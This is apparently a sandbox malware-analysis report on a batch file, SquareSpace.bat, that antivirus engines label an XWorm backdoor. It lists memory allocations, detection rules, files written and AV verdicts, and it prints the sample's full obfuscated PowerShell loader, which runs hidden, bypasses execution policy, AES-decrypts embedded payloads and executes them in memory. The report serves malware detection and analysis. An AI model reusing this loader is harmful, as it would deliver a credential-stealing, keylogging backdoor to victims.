NtAllocateVirtualMemory Feb. 11, 2025, 10:41 a.m.	process_identifier: 2756 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x020f3000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Feb. 11, 2025, 10:41 a.m.	process_identifier: 2756 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x020f4000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Feb. 11, 2025, 10:41 a.m.	process_identifier: 2756 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0216b000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Feb. 11, 2025, 10:41 a.m.	process_identifier: 2756 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02167000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Feb. 11, 2025, 10:41 a.m.	process_identifier: 2756 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x020eb000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Feb. 11, 2025, 10:41 a.m.	process_identifier: 2756 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02152000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Feb. 11, 2025, 10:41 a.m.	process_identifier: 2756 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02165000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Feb. 11, 2025, 10:41 a.m.	process_identifier: 2756 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x020f5000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Feb. 11, 2025, 10:41 a.m.	process_identifier: 2756 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0215c000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Feb. 11, 2025, 10:41 a.m.	process_identifier: 2756 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x029d0000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Feb. 11, 2025, 10:41 a.m.	process_identifier: 2756 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x020f6000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Feb. 11, 2025, 10:41 a.m.	process_identifier: 2756 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0216c000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Feb. 11, 2025, 10:41 a.m.	process_identifier: 2756 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02153000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Feb. 11, 2025, 10:41 a.m.	process_identifier: 2756 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02154000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Feb. 11, 2025, 10:41 a.m.	process_identifier: 2756 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02155000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Feb. 11, 2025, 10:41 a.m.	process_identifier: 2756 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02156000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Feb. 11, 2025, 10:41 a.m.	process_identifier: 2756 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02157000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Feb. 11, 2025, 10:41 a.m.	process_identifier: 2756 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02158000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Feb. 11, 2025, 10:41 a.m.	process_identifier: 2756 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02159000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Feb. 11, 2025, 10:41 a.m.	process_identifier: 2756 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02ab0000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Feb. 11, 2025, 10:41 a.m.	process_identifier: 2756 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02ab1000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Feb. 11, 2025, 10:41 a.m.	process_identifier: 2756 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02ab2000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Feb. 11, 2025, 10:41 a.m.	process_identifier: 2756 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02ab3000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Feb. 11, 2025, 10:41 a.m.	process_identifier: 2756 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02ab4000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Feb. 11, 2025, 10:41 a.m.	process_identifier: 2756 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02ab5000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Feb. 11, 2025, 10:41 a.m.	process_identifier: 2756 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02ab6000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Feb. 11, 2025, 10:41 a.m.	process_identifier: 2756 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02ab7000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Feb. 11, 2025, 10:41 a.m.	process_identifier: 2756 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02ab8000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Feb. 11, 2025, 10:41 a.m.	process_identifier: 2756 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02ab9000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Feb. 11, 2025, 10:41 a.m.	process_identifier: 2756 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02aba000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Feb. 11, 2025, 10:41 a.m.	process_identifier: 2756 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02abb000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Feb. 11, 2025, 10:41 a.m.	process_identifier: 2756 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02abc000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Feb. 11, 2025, 10:41 a.m.	process_identifier: 2756 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02abd000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Feb. 11, 2025, 10:41 a.m.	process_identifier: 2756 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02abe000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Feb. 11, 2025, 10:41 a.m.	process_identifier: 2756 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02abf000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Feb. 11, 2025, 10:41 a.m.	process_identifier: 2756 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02b00000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Feb. 11, 2025, 10:41 a.m.	process_identifier: 2756 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02b01000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Feb. 11, 2025, 10:41 a.m.	process_identifier: 2756 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02b02000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Feb. 11, 2025, 10:41 a.m.	process_identifier: 2756 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02b03000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Feb. 11, 2025, 10:41 a.m.	process_identifier: 2756 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02b04000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1

Creates a shortcut to an executable file (1 event)

file	C:\Users\test22\AppData\Local\Temp\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk

Creates a suspicious process (1 event)

cmdline

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('SxdwVCPCgMSsIsCvtPeAC0Y12ZfQwy15kMKZCEJ6U1A='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('1P9strNakfrnpmB7wPi6rQ=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $VPckSkjWDpUVVwmMVWvXbNWwYjoPPMgErqUnOiRuRcwJLjhowmpdMCJiSGmJ=New-Object System.IO.MemoryStream(,$param_var); $VtgRipEFCZYMfagYqnKOcasCwcRPGMuiWizxVFAwFCMxoCYMvLRFVyGVbDug=New-Object System.IO.MemoryStream; $xOYQEPQWBJcKMniAnVnTdfuVUPmxBDwrkuZQDWTyMbkLIhSHpgHfqBcrucVO=New-Object System.IO.Compression.GZipStream($VPckSkjWDpUVVwmMVWvXbNWwYjoPPMgErqUnOiRuRcwJLjhowmpdMCJiSGmJ, [IO.Compression.CompressionMode]::Decompress); $xOYQEPQWBJcKMniAnVnTdfuVUPmxBDwrkuZQDWTyMbkLIhSHpgHfqBcrucVO.CopyTo($VtgRipEFCZYMfagYqnKOcasCwcRPGMuiWizxVFAwFCMxoCYMvLRFVyGVbDug); $xOYQEPQWBJcKMniAnVnTdfuVUPmxBDwrkuZQDWTyMbkLIhSHpgHfqBcrucVO.Dispose(); $VPckSkjWDpUVVwmMVWvXbNWwYjoPPMgErqUnOiRuRcwJLjhowmpdMCJiSGmJ.Dispose(); $VtgRipEFCZYMfagYqnKOcasCwcRPGMuiWizxVFAwFCMxoCYMvLRFVyGVbDug.Dispose(); $VtgRipEFCZYMfagYqnKOcasCwcRPGMuiWizxVFAwFCMxoCYMvLRFVyGVbDug.ToArray();}function execute_function($param_var,$param2_var){ $CsvXnLzsosWrcPhcVInNXFiuVqbJsHvAafVtGmyXHAsXkqdBuawMPiRXkabW=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $JQZGWvqWTNvIjqfwmlkFmApslJLRoYjFkBnQBMaOZgHGENCycuLYQwJiAHvm=$CsvXnLzsosWrcPhcVInNXFiuVqbJsHvAafVtGmyXHAsXkqdBuawMPiRXkabW.EntryPoint; $JQZGWvqWTNvIjqfwmlkFmApslJLRoYjFkBnQBMaOZgHGENCycuLYQwJiAHvm.Invoke($null, $param2_var);}$EExudKaOmVNfBRomsysLOBsLZJukJlGHlfFDRhWUsQXULBHRkAEiODfdmMvt = 'C:\Users\test22\AppData\Local\Temp\SquareSpace.bat';$host.UI.RawUI.WindowTitle = $EExudKaOmVNfBRomsysLOBsLZJukJlGHlfFDRhWUsQXULBHRkAEiODfdmMvt;$LDnZGGbUCOCSOxwdsnbKISRUSusOfyXBNqjFYMJgoDSSoyMLfhDZaXySLthl = [type]::GetType('System.IO.File');$nnPeQbfxnRfGEVwfaYFuIGIYVYBPSrTFExSaNOcnsoxobXveBsSMNNDHEQjS = [type]::GetType('System.Environment');$KyIUEPxIcoVAkvFgSJNxgmOTmkPORfqTqNeAxMcPqUwOylOvQDpRTXgxKPIt = $LDnZGGbUCOCSOxwdsnbKISRUSusOfyXBNqjFYMJgoDSSoyMLfhDZaXySLthl::('txeTllAdaeR'[-1..-11] -join '')($EExudKaOmVNfBRomsysLOBsLZJukJlGHlfFDRhWUsQXULBHRkAEiODfdmMvt);$aJQXYbjwqeIfHYhmQavbwuXoPzatHHQIeIPGeyPwbrfLVjkVQUHJtGWFLCiz = $nnPeQbfxnRfGEVwfaYFuIGIYVYBPSrTFExSaNOcnsoxobXveBsSMNNDHEQjS::NewLine;$bQOIoZbYjAhrlYZfolsFofCNahoyLjUBqqvlCwxVilMpMpyvGRqAjCkWnbIh = $KyIUEPxIcoVAkvFgSJNxgmOTmkPORfqTqNeAxMcPqUwOylOvQDpRTXgxKPIt.Split($aJQXYbjwqeIfHYhmQavbwuXoPzatHHQIeIPGeyPwbrfLVjkVQUHJtGWFLCiz);$qPeaogTvlKukBxtYDxZycDaiGySIaCrfMDEDLWGFHlFzfuGqkhzPMWqMPWtQ = $bQOIoZbYjAhrlYZfolsFofCNahoyLjUBqqvlCwxVilMpMpyvGRqAjCkWnbIh;foreach ($UJKbcwdbduZbtlriedZkEbJNcyWwRFJpqpWmXwsxOWoMANVHPQHJBvnSZXYD in $qPeaogTvlKukBxtYDxZycDaiGySIaCrfMDEDLWGFHlFzfuGqkhzPMWqMPWtQ) { if ($UJKbcwdbduZbtlriedZkEbJNcyWwRFJpqpWmXwsxOWoMANVHPQHJBvnSZXYD.StartsWith(':: ')) { $nluJtoyYTQmHRuQQXAcmRBxTdCtPnRNPDQrwQWgRVIxuUSYrgzPpTgYLNBFR=$UJKbcwdbduZbtlriedZkEbJNcyWwRFJpqpWmXwsxOWoMANVHPQHJBvnSZXYD.Substring(3); break; }}$payloads_var=[string[]]$nluJtoyYTQmHRuQQXAcmRBxTdCtPnRNPDQrwQWgRVIxuUSYrgzPpTgYLNBFR.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));

A process created a hidden window (1 event)

Time & API	Arguments	Status	Return	Repeated
CreateProcessInternalW Feb. 11, 2025, 10:41 a.m.	thread_identifier: 2760 thread_handle: 0x00000088 process_identifier: 2756 current_directory: C:\Users\test22\AppData\Local\Temp filepath: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe track: 1 command_line: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('SxdwVCPCgMSsIsCvtPeAC0Y12ZfQwy15kMKZCEJ6U1A='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('1P9strNakfrnpmB7wPi6rQ=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $VPckSkjWDpUVVwmMVWvXbNWwYjoPPMgErqUnOiRuRcwJLjhowmpdMCJiSGmJ=New-Object System.IO.MemoryStream(,$param_var); $VtgRipEFCZYMfagYqnKOcasCwcRPGMuiWizxVFAwFCMxoCYMvLRFVyGVbDug=New-Object System.IO.MemoryStream; $xOYQEPQWBJcKMniAnVnTdfuVUPmxBDwrkuZQDWTyMbkLIhSHpgHfqBcrucVO=New-Object System.IO.Compression.GZipStream($VPckSkjWDpUVVwmMVWvXbNWwYjoPPMgErqUnOiRuRcwJLjhowmpdMCJiSGmJ, [IO.Compression.CompressionMode]::Decompress); $xOYQEPQWBJcKMniAnVnTdfuVUPmxBDwrkuZQDWTyMbkLIhSHpgHfqBcrucVO.CopyTo($VtgRipEFCZYMfagYqnKOcasCwcRPGMuiWizxVFAwFCMxoCYMvLRFVyGVbDug); $xOYQEPQWBJcKMniAnVnTdfuVUPmxBDwrkuZQDWTyMbkLIhSHpgHfqBcrucVO.Dispose(); $VPckSkjWDpUVVwmMVWvXbNWwYjoPPMgErqUnOiRuRcwJLjhowmpdMCJiSGmJ.Dispose(); $VtgRipEFCZYMfagYqnKOcasCwcRPGMuiWizxVFAwFCMxoCYMvLRFVyGVbDug.Dispose(); $VtgRipEFCZYMfagYqnKOcasCwcRPGMuiWizxVFAwFCMxoCYMvLRFVyGVbDug.ToArray();}function execute_function($param_var,$param2_var){ $CsvXnLzsosWrcPhcVInNXFiuVqbJsHvAafVtGmyXHAsXkqdBuawMPiRXkabW=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $JQZGWvqWTNvIjqfwmlkFmApslJLRoYjFkBnQBMaOZgHGENCycuLYQwJiAHvm=$CsvXnLzsosWrcPhcVInNXFiuVqbJsHvAafVtGmyXHAsXkqdBuawMPiRXkabW.EntryPoint; $JQZGWvqWTNvIjqfwmlkFmApslJLRoYjFkBnQBMaOZgHGENCycuLYQwJiAHvm.Invoke($null, $param2_var);}$EExudKaOmVNfBRomsysLOBsLZJukJlGHlfFDRhWUsQXULBHRkAEiODfdmMvt = 'C:\Users\test22\AppData\Local\Temp\SquareSpace.bat';$host.UI.RawUI.WindowTitle = $EExudKaOmVNfBRomsysLOBsLZJukJlGHlfFDRhWUsQXULBHRkAEiODfdmMvt;$LDnZGGbUCOCSOxwdsnbKISRUSusOfyXBNqjFYMJgoDSSoyMLfhDZaXySLthl = [type]::GetType('System.IO.File');$nnPeQbfxnRfGEVwfaYFuIGIYVYBPSrTFExSaNOcnsoxobXveBsSMNNDHEQjS = [type]::GetType('System.Environment');$KyIUEPxIcoVAkvFgSJNxgmOTmkPORfqTqNeAxMcPqUwOylOvQDpRTXgxKPIt = $LDnZGGbUCOCSOxwdsnbKISRUSusOfyXBNqjFYMJgoDSSoyMLfhDZaXySLthl::('txeTllAdaeR'[-1..-11] -join '')($EExudKaOmVNfBRomsysLOBsLZJukJlGHlfFDRhWUsQXULBHRkAEiODfdmMvt);$aJQXYbjwqeIfHYhmQavbwuXoPzatHHQIeIPGeyPwbrfLVjkVQUHJtGWFLCiz = $nnPeQbfxnRfGEVwfaYFuIGIYVYBPSrTFExSaNOcnsoxobXveBsSMNNDHEQjS::NewLine;$bQOIoZbYjAhrlYZfolsFofCNahoyLjUBqqvlCwxVilMpMpyvGRqAjCkWnbIh = $KyIUEPxIcoVAkvFgSJNxgmOTmkPORfqTqNeAxMcPqUwOylOvQDpRTXgxKPIt.Split($aJQXYbjwqeIfHYhmQavbwuXoPzatHHQIeIPGeyPwbrfLVjkVQUHJtGWFLCiz);$qPeaogTvlKukBxtYDxZycDaiGySIaCrfMDEDLWGFHlFzfuGqkhzPMWqMPWtQ = $bQOIoZbYjAhrlYZfolsFofCNahoyLjUBqqvlCwxVilMpMpyvGRqAjCkWnbIh;foreach ($UJKbcwdbduZbtlriedZkEbJNcyWwRFJpqpWmXwsxOWoMANVHPQHJBvnSZXYD in $qPeaogTvlKukBxtYDxZycDaiGySIaCrfMDEDLWGFHlFzfuGqkhzPMWqMPWtQ) { if ($UJKbcwdbduZbtlriedZkEbJNcyWwRFJpqpWmXwsxOWoMANVHPQHJBvnSZXYD.StartsWith(':: ')) { $nluJtoyYTQmHRuQQXAcmRBxTdCtPnRNPDQrwQWgRVIxuUSYrgzPpTgYLNBFR=$UJKbcwdbduZbtlriedZkEbJNcyWwRFJpqpWmXwsxOWoMANVHPQHJBvnSZXYD.Substring(3); break; }}$payloads_var=[string[]]$nluJtoyYTQmHRuQQXAcmRBxTdCtPnRNPDQrwQWgRVIxuUSYrgzPpTgYLNBFR.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] ('')); filepath_r: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe stack_pivoted: 0 creation_flags: 524288 (EXTENDED_STARTUPINFO_PRESENT) inherit_handles: 1 process_handle: 0x00000084	1	1	0

File has been identified by 5 AntiVirus engines on VirusTotal as malicious (5 events)

TrendMicro-HouseCall	Backdoor.BAT.XWORM.YXFBJZ
Kaspersky	HEUR:Trojan.PowerShell.Agent.gen
TrendMicro	Backdoor.BAT.XWORM.YXFBJZ
Kingsoft	Win32.Troj.Undef.a
Microsoft	Trojan:Script/Wacatac.B!ml

Checks for the Locally Unique Identifier on the system for a suspicious privilege (1 event)

Time & API	Arguments	Status	Return	Repeated
LookupPrivilegeValueW Feb. 11, 2025, 10:41 a.m.	system_name: privilege_name: SeDebugPrivilege	1	1	0

Yara rule detected in process memory (31 events)

description	Create a windows service	rule	Create_Service
description	Communications over RAW Socket	rule	Network_TCP_Socket
description	Communication using DGA	rule	Network_DGA
description	Match Windows Http API call	rule	Str_Win32_Http_API
description	Take ScreenShot	rule	ScreenShot
description	Escalate priviledges	rule	Escalate_priviledges
description	Steal credential	rule	local_credential_Steal
description	PWS Memory	rule	Generic_PWS_Memory_Zero
description	Record Audio	rule	Sniff_Audio
description	Communications over HTTP	rule	Network_HTTP
description	Communications use DNS	rule	Network_DNS
description	Code injection with CreateRemoteThread in a remote process	rule	Code_injection
description	(no description)	rule	DebuggerCheck__GlobalFlags
description	(no description)	rule	DebuggerCheck__QueryInfo
description	(no description)	rule	DebuggerCheck__RemoteAPI
description	(no description)	rule	DebuggerHiding__Thread
description	(no description)	rule	DebuggerHiding__Active
description	(no description)	rule	DebuggerException__ConsoleCtrl
description	(no description)	rule	DebuggerException__SetConsoleCtrl
description	(no description)	rule	ThreadControl__Context
description	(no description)	rule	SEH__vectored
description	(no description)	rule	Check_Dlls
description	Checks if being debugged	rule	anti_dbg
description	Anti-Sandbox checks for ThreatExpert	rule	antisb_threatExpert
description	Bypass DEP	rule	disable_dep
description	Affect hook table	rule	win_hook
description	File Downloader	rule	Network_Downloader
description	Match Windows Inet API call	rule	Str_Win32_Internet_API
description	Communications over FTP	rule	Network_FTP
description	Run a KeyLogger	rule	KeyLogger
description	Communications over P2P network	rule	Network_P2P_Win

Creates a suspicious Powershell process (3 events)

option	-ep bypass	value	Attempts to bypass execution policy
option	-noprofile	value	Does not load current user profile
option	-windowstyle hidden	value	Attempts to execute command with a hidden window

The process powershell.exe wrote an executable file to disk (20 events)

file	C:\Windows\System32\ie4uinit.exe
file	C:\Program Files\Windows Sidebar\sidebar.exe
file	C:\Windows\System32\WindowsAnytimeUpgradeUI.exe
file	C:\Windows\System32\xpsrchvw.exe
file	C:\Windows\System32\displayswitch.exe
file	C:\Program Files\Common Files\Microsoft Shared\ink\mip.exe
file	C:\Windows\System32\mblctr.exe
file	C:\Windows\System32\mstsc.exe
file	C:\Windows\System32\SnippingTool.exe
file	C:\Windows\System32\SoundRecorder.exe
file	C:\Windows\System32\dfrgui.exe
file	C:\Windows\System32\msinfo32.exe
file	C:\Windows\System32\rstrui.exe
file	C:\Program Files\Common Files\Microsoft Shared\ink\ShapeCollector.exe
file	C:\Program Files\Windows Journal\Journal.exe
file	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
file	C:\Windows\System32\MdSched.exe
file	C:\Windows\System32\msconfig.exe
file	C:\Windows\System32\recdisc.exe
file	C:\Windows\System32\msra.exe

SquareSpace.bat

Process Tree Toggle all

Network Toggle all

Suricata Toggle all

Suricata Alerts

Suricata TLS

Signatures Toggle All